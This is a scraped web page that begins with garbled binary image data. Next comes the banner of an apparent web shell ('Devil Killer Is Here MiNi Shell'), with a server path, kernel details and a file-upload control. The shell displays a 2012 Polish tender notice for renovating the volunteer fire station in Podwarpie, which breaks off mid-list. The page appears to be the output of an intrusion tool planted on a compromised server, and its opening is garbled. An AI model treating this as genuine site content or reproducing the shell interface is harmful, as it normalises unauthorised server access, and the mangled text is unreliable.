JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120717/255846-N-2012.html

<p class="kh_header"><b>Siewierz: Wykonanie remontu i termomodernizacji budynku remizy OSP  w Podwarpiu wraz z  zagospodarowaniem terenu</b><br>
<b>Numer ogłoszenia: 255846 - 2012; data zamieszczenia: 17.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Siewierz , ul. Żwirki i Wigury 16, 42-470 Siewierz, woj. śląskie, tel. 0326499471, 6499400, faks 032 6499402.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.siewierz.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie remontu i termomodernizacji budynku remizy OSP  w Podwarpiu wraz z  zagospodarowaniem terenu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie remontu i termomodernizacji budynku remizy OSP w Podwarpiu wraz z  zagospodarowaniem terenu. Szczegółowy przedmiot zamówienia określony został w dokumentacji projektowej, przedmiarach robót,  specyfikacji technicznej wykonania i odbioru robót oraz w niniejszej specyfikacji istotnych warunków zamówienia i  obejmuje w szczególności: 
a)wykonanie remontu i termomodernizacji budynku remizy OSP w Podwarpiu, opisanych szczegółowo   w projekcie architektoniczno - budowlanym Termomodernizacja budynku wraz z remontem i rozbudową budynku o podjazd dla osób niepełnosprawnych oraz projekt zagospodarowania terenu  z uwzględnieniem parkingu dla budynku remizy Ochotniczej Straży Pożarnej w Podwarpiu oraz w Specyfikacjach technicznych  wykonania  i odbioru robót budowlanych - Projekt budowlany przebudowy budynku remizy OSP w Podwarpiu (Roboty ogólnobudowlane) w tym w szczególności: 
demontaż starych okien drewnianych (7 szt.), drzwi (3 szt. drzwi garażowych), krat, ościeżnic, rynien i rur spustowych, obróbek blacharskich, likwidacja okien z luksferów (4 szt.),betonowych daszków i gzymsów,  likwidacja starego systemu c.o., skucie wierzchniej, popękanej powierzchni schodów wejściowych oraz    podestów, obicie kominów z uszkodzonych tynków, oczyszczenie blachy cynkowej na dachu przed malowaniem. (Uwaga: Przedmiot zamówienia  nie obejmuje  budowy podjazdu dla osób niepełnosprawnych oraz  wyburzenia istniejących schodów i budowy schodów nowych i ogranicza zakres prac w tym zakresie do   remontu istniejących schodów i podestów schodowych),
zamurowanie zbędnych otworów (w tym otworów po zlikwidowanych drzwiach garażowych o wym.  3,40 x 3,80 m oraz 2,0 x 1,5 m), dostawa i montaż nowych okien (0,9x1,45m - 4 szt., 0,78x0,80 m -   4 szt., 0,90x1,20 m - 3 szt. - wszystkie okna wzmocnione z szybami P4W) dostawa i montaż drzwi  zewnętrznych stalowych (wym.: 1,0 mx1,50 m), okien plastikowych zwykłych (0,90 m x 0,90 m - 3 szt.),  rynien i rur spustowych, wykonanie wylewek betonowych, otynkowanie ścian i sufitów w pomieszczeniach   piwnic, zamontowanie drzwi p.poż. w pom. kotłowni, otynkowanie kominów, malowanie 2-krotne farbą   emulsyjną pomieszczeń parteru i pierwszego piętra (bez pomieszczeń garażowych), wykonanie daszku  nad wejściami do budynku o łącznej pow. 39,15  m2, wyrównanie i nadlanie betonem stopni schodów   i podestów oraz montaż na stopniach i  na podestach płytek antypoślizgowych - klinkierowych, dostawa   i montaż 3 szt drzwi wewnętrznych pełnych wraz z ościeżnicami w piwnicach budynku,
montaż nowych drzwi garażowych (2 szt.) - bramy przemysłowe segmentowe, częściowo przeszklone z drzwiami wejściowymi w świetle bramy, wyposażone w automatykę (wym: 3,14x3,74m oraz 3,40x3,74),
dwukrotne malowanie emalią poliwinylową pokrycia dachowego budynku, wykonanie wokół budynku opaski z kostki brukowej o szer. 50 cm ograniczonej obrzeżami, ułożenie kostki brukowej (wykonanie  korytowania, zagęszczenie podłoża, ułożenie warstwy odcinającej, podbudowy z kruszywa , podsypki cementowo-piaskowej i ułożenie kostki) na powierzchni 100 m2,
wykonanie docieplenia ścian fundamentowych wraz z wykonaniem izolacji przeciwwilgociowej i przeciwwodnej, wykonanie docieplenia ścian zewnętrznych nadziemia styropianem o grubości 10 cm, wykonanie docieplenia stropu płytami z wełny mineralnej  o grubości 15 cm, układanych na sucho,   wykonanie tynków elewacyjnych na całej powierzchni ścian zewnętrznych budynku,
b)wykonanie zagospodarowania terenu, opisanego szczegółowo w projekcie architektoniczno-budowlanym: Termomodernizacja  budynku wraz z remontem   i rozbudową budynku o podjazd dla osób niepełnosprawnych oraz projekt zagospodarowania terenu   z uwzględnieniem parkingu dla budynku remizy Ochotniczej Straży Pożarnej w Podwarpiu oraz w Specyfikacjach technicznych wykonania i odbioru robót budowlanych - Projekt     budowlany przebudowy budynku remizy OSP w Podwarpiu (Roboty ogólnobudowlane) w tym    w szczególności: 
-rozebranie  starych murów dobudówki do istniejącego budynku oraz starej, nieczynnej budowli na posesji remizy, wywóz gruzu na składowisko odpadów, oczyszczenie posesji (w tym wycięcie krzaków),
-wykonanie dojazdów i parkingów z kostki brukowej na łącznej powierzchni 620,5 m2 w tym: korytowanie   terenu na całej powierzchni na głębokość 56 cm.,  wywóz ziemi na wysypisko, wyprofilowanie  i zagęszczenie podłoża, wykonanie warstwy odcinającej o gr. 20 cm., wykonanie podbudowy z kruszywa  o gr. 25 cm., podsypki cementowo-piaskowej o gr. 3cm, wykonanie nawierzchni z kostki brukowej  o gr. 8 cm. na pow. 620,5 m2  oraz ułożenie krawężników betonowych na ławach betonowych i podsypce cementowo-piaskowej na długości 183,5 mb., 
-wykonanie ogrodzenia posesji na długości 240 mb z paneli ramowych osadzonych na słupkach stalowych   (profile o przekroju 60x40 mm o rozstawie do 2,5 m)  z wykonaniem betonowych podmurówek na całej    długości ogrodzenia (dopuszcza się ich wykonanie z gotowych płyt betonowych) z zamontowaniem  dwóch kompletów wrót o szer. min. 3 m i dwóch furtek o szer. 1 m. 
c)wykonanie instalacji wentylacji, opisanej szczegółowo w Projekcie budowlanym instalacji wentylacji   w budynku remizy OSP oraz w Specyfikacjach technicznych wykonania    i odbioru robót budowlanych -   Instalacje sanitarne w tym w szczególności:
-dostawa i zainstalowanie okapu wentylacyjnego kuchennego przyściennego  o wymiarach:100 cm x 150 cm, wykonanego z blachy nierdzewnej,
- dostawa i zainstalowanie 14 szt. wentylatorów ściennych, zasilanych elektrycznie     
d)wykonanie instalacji elektrycznej w pomieszczeniach piwnicy, opisanej szczegółowo w Projekcie   budowlanym dla budynku remizy OSP w Podwarpiu - PTB instalacje wewnętrzne piwnicy oraz   w specyfikacjach technicznych ST 030100 Instalacje elektryczne ogólne - EE w tym w szczególności:
- dostawa i zainstalowanie tablicy rozdzielczej wyposażonej w urządzenia ochrony przeciwporażeniowej   (wyłącznik przeciwporażeniowy różnicowo-prądowy) oraz w urządzenia ochrony przepięciowej  (ochronniki klasy B+C),
-wykonanie instalacji oświetlenia z zastosowaniem opraw świetlówkowych,          10 szt. (w tym 5 szt. opraw wyposażonych w 2-godzinne moduły awaryjne)
- wykonanie instalacji gniazd wtykowych 16A - 16 szt. gniazd z pokrywką, natynkowych, hermetycznych i uziemionych (w tym 14 szt. 2-wtykowych i 2 szt. 1-wtykowych),
e)wykonanie nowej instalacji odgromowej, opisanej szczegółowo w Projekcie budowlanym dla budynku  remizy OSP w Podwarpiu - PTB instalacja odgromowa oraz w Specyfikacji technicznej wykonania  i odbioru robót budowlanych - instalacja odgromowa,
f)wykonanie wewnętrznej instalacji gazowej, opisanej szczegółowo w Projekcie budowlanym wewnętrznej   instalacji gazowej wraz z kotłem c.o. w budynku remizy OSP oraz w Specyfikacjach technicznych   wykonania i odbioru robót budowlanych - instalacje sanitarne (Uwaga Przedmiot zamówienia nie obejmuje wymiany urządzeń gazowych wyposażenia kuchennego - pozostają wszystkie urządzenia aktualnie  eksploatowane), w tym w szczególności:
-demontaż starej instalacji gazowej wraz z piecami  wieloczerpalnymi (14 szt.), zamurowanie otworów   w ścianach po zdemontowanej instalacji, 
-dostawa i montaż kotła gazowego c.o. - 1 szt. (jednofunkcyjny, z zamkniętą komorą spalania, z kompletną automatyką, moc 35 kW, zamontowanie nowej skrzynki naściennej dla istniejącego  przyłącza gazowego,
g)wykonanie instalacji centralnego ogrzewania, opisanej szczegółowo w Projekcie budowlanym  instalacji centralnego ogrzewania w budynku remizy OSP oraz w Specyfikacjach technicznych wykonania i odbioru robót budowlanych - instalacje sanitarne, w tym w szczególności:
-dostawa i zainstalowanie grzejników c.o. - szt. 29 (dane techniczne grzejników zawarte są w Projekcie  budowlanym), 
-uruchomienie kotła gazowego wraz z uruchomieniem automatyki sterowania kotłem, sprawdzenie  poprawności działania systemu c.o.,
Pozostałe warunki zlecenia:
1)Wykonawca zobowiązany będzie do:
a)wykonania przyłącza wodociągowego i energetycznego dla potrzeb terenu budowy w taki sposób, aby możliwe było określenie wielkości zużycia mediów i obciążenie Wykonawcę kosztami ich zużycia,
b)zapewnienie uprawnionego nadzoru i dozoru nad wykonywanymi robotami budowlanymi i instalacyjnymi w tym, w szczególności, wynikających z Prawa budowlanego oraz Decyzji Starosty Będzińskiego.
c)urządzenia terenu budowy i odpowiedniego jego zabezpieczenia i oznakowania,
d)poniesienia ewentualnych kosztów wyłączeń i włączeń energii elektrycznej,
e)wykonania i stosowania w praktyce zapisów projektu organizacji i technologii robót           z uwzględnieniem warunków bhp,
f)w przypadku zniszczenia lub uszkodzenia w toku realizacji: robót, ich części, urządzeń lub też elementów istniejących- naprawienia ich i doprowadzenie do stanu pierwotnego na własny koszt,
g)zapewnienie obsługi geodezyjnej,
h)wykonania badań, prób i rozruchu, jak również do dokonania odkrywek w przypadku nie zgłoszenia robót do odbioru ulegających zakryciu lub zanikających,
i)zapewnienia uprawnionego nadzoru i dozoru, a także właściwych warunków bezpieczeństwa i higieny pracy,
j)usuwania na bieżąco zbędnych materiałów, odpadów i śmieci,
k)uporządkowania terenu budowy po zakończeniu robót i przekazanie go Zamawiającemu najpóźniej do dnia odbioru końcowego,
2)Przedmiary robót są elementem pomocniczym do wyliczenia ceny ryczałtowej. Ewentualne błędy w przedmiarach nie będą stanowiły podstawy do roszczeń Wykonawcy względem Zamawiającego. W celu prawidłowego przygotowania oferty (skalkulowania ceny ryczałtowej za wykonanie prac) zaleca    się przeprowadzenie wizji w terenie
3)Wykonawca jest zobowiązany do wykonania innych prac, nie wymienionych        w projektach, specyfikacjach   technicznych, a których wykonanie jest niezbędne w celu wykonania danego zadania lub wynika z przyjętej   technologii wykonywania prac, z przepisów BHP lub niezbędnych w celu zabezpieczenia budynku lub mienia   znajdującego się w pomieszczeniach tego budynku. 
4)Ewentualne materiały budowlane, urządzenia i ich producenci wymienione    w dokumentacji projektowej, specyfikacjach technicznych wykonania i odbioru robót lub przedmiarach robót zostały wskazane przykładowo. Zamawiający dopuszcza rozwiązania równoważne.
5)W trakcie robót Wykonawca zobowiązany będzie przedstawić materiały do akceptacji  Zamawiającemu przed ich zastosowaniem lub wbudowaniem
6)Materiały i części uzyskane z rozbiórki stanowią własność Zamawiającego i Wykonawca winien przedsięwziąć wszelkie środki ostrożności niezbędne dla ich zabezpieczenia. Niezależnie od celu, w jakim Zamawiający zamierza użyć rzeczone materiały i części, wszelkie koszty poniesione na transport i składowanie w miejscu wskazanym przez Zamawiającego będą pokryte przez Wykonawcę przy transporcie na odległość do 15 km,
7)Wykonawca jest zobowiązany do stałej współpracy z Zamawiającym w celu koordynowania prawidłowego przebiegu prac.
8)Wykonawca udzieli gwarancji jakości na przedmiot umowy nie mniejszej niż 36 miesięcy liczonej od dnia odebrania przez Zamawiającego robót budowlanych   i podpisania bez uwag protokołu końcowego bezusterkowego - co zostanie potwierdzone na formularzu ofertowym - zał. Nr 1 do SIWZ.
9)Warunki płatności: wynagrodzenie będzie płatne w dwóch częściach w terminie do 30 dni od daty wpływu do Zamawiającego danej faktury wraz z podpisanym przez obie strony protokołem odbioru i oświadczeniami podwykonawców i wykonawcy o nie zaleganiu  z zapłatą należności na rzecz podwykonawców.
10)Na realizację części zadania Gmina uzyskała dofinansowanie Samorządu Województwa Śląskiego w ramach   działania 413 Wdrażanie lokalnych strategii rozwoju w zakresie operacji odpowiadających warunkom  przyznania pomocy w ramach działania Odnowa i rozwój wsi objętego PROW na lata 2007-2013.   W związku z powyższym procedury związane z odbiorami częściowymi, końcowymi i płatnościami będą    dostosowane do wymogów instytucji pośredniczącej PROW.
11)Wykonawca jest zobowiązany do  umieszczenia w miejscu realizacji inwestycji tablicy informującej o finansowaniu operacji ze  środków Unii Europejskiej, wykonanej zgodnie z przepisami rozporządzenia 1974/2006 oraz  z warunkami określonymi w Księdze wizualizacji znaku marki Programu Rozwoju Obszarów Wiejskich na    lata 2007-2013.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.33.30.00-0, 45.33.11.10-0, 45.31.12.00-2, 45.33.12.00-8, 45.11.00.00-1, 45.45.30.00-7, 45.32.10.00-3, 45.34.20.00-6, 45.23.31.20-6, 45.45.30.00-7, 45.33.11.00-7, 45.33.00.00-9, 45.31.70.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie wiedzy i   doświadczenia,  potwierdzone: 
wykonaniem w ciągu ostatnich pięciu lat przed upływem terminu składania  ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: 
co najmniej dwóch robót ogólnobudowlanych o wartości nie mniejszej niż 300 000 złotych brutto każda. 
Na potwierdzenie powyższego warunku Zamawiający żąda:
a)Wykazu robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania  - wg zał. nr 4, 
b)Dokumenty potwierdzające, że roboty wymienione w wykazie zostały wykonane zgodnie   z zasadami sztuki budowlanej i prawidłowo ukończone.
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału   w postępowaniu na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia - nie spełnia. Z treści załączonych do oferty dokumentów musi wynikać jednoznacznie, że ww. warunki Wykonawca spełnił</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie   osobami, zdolnymi do   wykonania zamówienia t.j. :  
a)co najmniej jedną osobą, posiadającą uprawnienia budowlane do wykonywania samodzielnych funkcji w budownictwie w specjalności konstrukcyjno - budowlanej, 
b)co najmniej jedną osobą, posiadającą uprawnienia do wykonywania samodzielnych funkcji w budownictwie w specjalności drogowej lub konstrukcyjno - budowlanej uprawniającej do nadzorowania robót drogowych,
c)co najmniej jedną osobą, posiadającą uprawnienia do wykonywania samodzielnych funkcji w budownictwie w specjalności instalacyjnej - w zakresie sieci, instalacji i urządzeń gazowych, wodociągowych i kanalizacyjnych,
Na potwierdzenie powyższego warunku Zamawiający żąda:
a)Wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacji o podstawie do dysponowania tymi osobami  wg zał. Nr 5.
b)Oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają  wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień  wg zał. Nr 5A.
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału   w postępowaniu na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia - nie spełnia. Z treści załączonych do oferty dokumentów musi wynikać jednoznacznie, że ww. warunki Wykonawca spełnił</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej w zakresie:
Posiadania opłaconego ubezpieczenia od odpowiedzialności cywilnej,  w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia    w wysokości  co najmniej  300 000 zł. 
Na potwierdzenie powyższych warunków Zamawiający żąda:
Opłaconej polisy, a w przypadku jej braku  innego dokumentu potwierdzającego, że Wykonawca ubezpieczony jest od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału    w postępowaniu na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia - nie spełnia. Z treści załączonych do oferty dokumentów musi wynikać jednoznacznie, że ww. warunki Wykonawca spełnił</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

